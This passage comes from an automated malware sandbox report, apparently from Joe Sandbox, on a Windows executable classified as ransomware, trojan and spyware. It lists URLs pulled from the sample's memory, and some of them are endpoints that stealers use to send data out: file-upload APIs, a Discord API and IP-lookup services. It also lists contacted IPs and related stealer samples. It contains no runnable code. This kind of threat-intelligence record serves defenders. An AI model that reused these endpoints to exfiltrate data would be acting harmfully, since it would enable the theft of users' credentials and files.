                                                            https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329639g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://peps.python.org/pep-0205/9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AD71000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2045682909.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2039094220.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2034507305.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2039896185.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399381962.000001F12AC00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048564293.000001F12AD6C000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                		high
                                                                http://www.microsoftNAV_CO~1.JSOy.9g9LZNE4bH.exe, 00000002.00000003.2397711771.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397324147.000001F12B4EF000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397218402.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2402488296.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reddit.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/urllib3/urllib3/issues/30209g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2190941611.000001B981DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03B381000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.amazon.ca/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6889g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A6F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.ebay.co.uk/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.2190941611.000001B981FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.ebay.de/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://go.micropowershell.exe, 0000002A.00000002.2242595273.000001C03C25C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2032706611.000001F128D69000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.amazon.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://contoso.com/Iconpowershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://support.mozilla.org/p9g9LZNE4bH.exe, 00000002.00000002.2401507128.000001F12B317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://httpbin.org/9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B157000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                          		high
                                                                                                          http://www.cl.cam.ac.uk/~mgk25/iso-time.html9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12ADED000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.ecosia.org/newtab/9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2112269853.000001F12B31C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2111259470.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2093044186.000001F12B23C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.youtube.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://allegro.pl/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5359g9LZNE4bH.exe, 00000002.00000002.2401915686.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2085401130.000001F12B471000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2144196309.000001F12B480000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://MD8.mozilla.org/1/m9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.python.org/psf/license/9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8D69000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.bbc.co.uk/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://ip-api.com/line/?fields=hostingr9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://bugzilla.mo9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://api.anonfiles.com/uploadr9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://tools.ietf.org/html/rfc6125#section-6.4.39g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12BF70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.2190941611.000001B981FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://google.com/mail9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://packaging.python.org/specifications/entry-points/9g9LZNE4bH.exe, 00000002.00000002.2404350121.000001F12BD40000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12ADED000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.google.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.iqiyi.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://foss.heptapod.net/pypy/pypy/-/issues/35399g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.9g9LZNE4bH.exe, 00000002.00000002.2401915686.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2085401130.000001F12B471000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2144196309.000001F12B480000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://google.com/9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://api.gofile.io/getServerr9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://ocsp.sectigo.com09g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.python.org/download/releases/2.3/mro/.9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://contoso.com/Licensepowershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://discordapp.com/api/v9/users/9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://ip-api.com/json/?fields=225545r9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://www.microsoftTASKLI~1.TXTy.9g9LZNE4bH.exe, 00000002.00000002.2402488296.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://github.com/urllib3/urllib3/issues/29209g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128CF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://yahoo.com/9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://account.bellmedia.c9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-69g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://login.microsoftonline.com9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C50C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://crl.thawte.com/ThawteTimestampingCA.crl09g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://html.spec.whatwg.org/multipage/9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://www.ifeng.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.zhihu.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://www.rfc-editor.org/rfc/rfc8259#section-8.19g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://contoso.com/powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://oneget.orgXpowershell.exe, 0000002A.00000002.2242595273.000001C03C986000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://www.iana.org/time-zones/repository/tz-link.html9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049688627.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048802049.000001F12AE54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  208.95.112.1
                                                                                                                                                                                                                  		ip-api.comUnited States
                                                                                                                                                                                                                  		53334TUT-ASUSfalse
                                                                                                                                                                                                                  162.159.137.232
                                                                                                                                                                                                                  		discord.comUnited States
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1584119
                                                                                                                                                                                                                  Start date and time:2025-01-04 09:41:07 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 10m 56s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:90
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:9g9LZNE4bH.exe
                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                  Original Sample Name:fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@143/56@2/2
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 60%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 51%
                                                                                                                                                                                                                  • Number of executed functions: 127
                                                                                                                                                                                                                  • Number of non-executed functions: 163
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.185.99, 20.12.23.50, 13.107.246.45, 52.149.20.212
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5440 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5704 because it is empty
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  03:42:03API Interceptor152x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                  03:42:06API Interceptor5x Sleep call for process: WMIC.exe modified

                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  208.95.112.1ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                  kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                  • ip-api.com/json/
                                                                                                                                                                                                                  file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                  file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                  file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                  23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                  XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                  Java32.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                  mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                  • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                  intro.avi.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                  • ip-api.com/json/

                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  discord.comAimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                  • 162.159.128.233
                                                                                                                                                                                                                  rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                  • 162.159.137.232
                                                                                                                                                                                                                  Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                  • 162.159.138.232
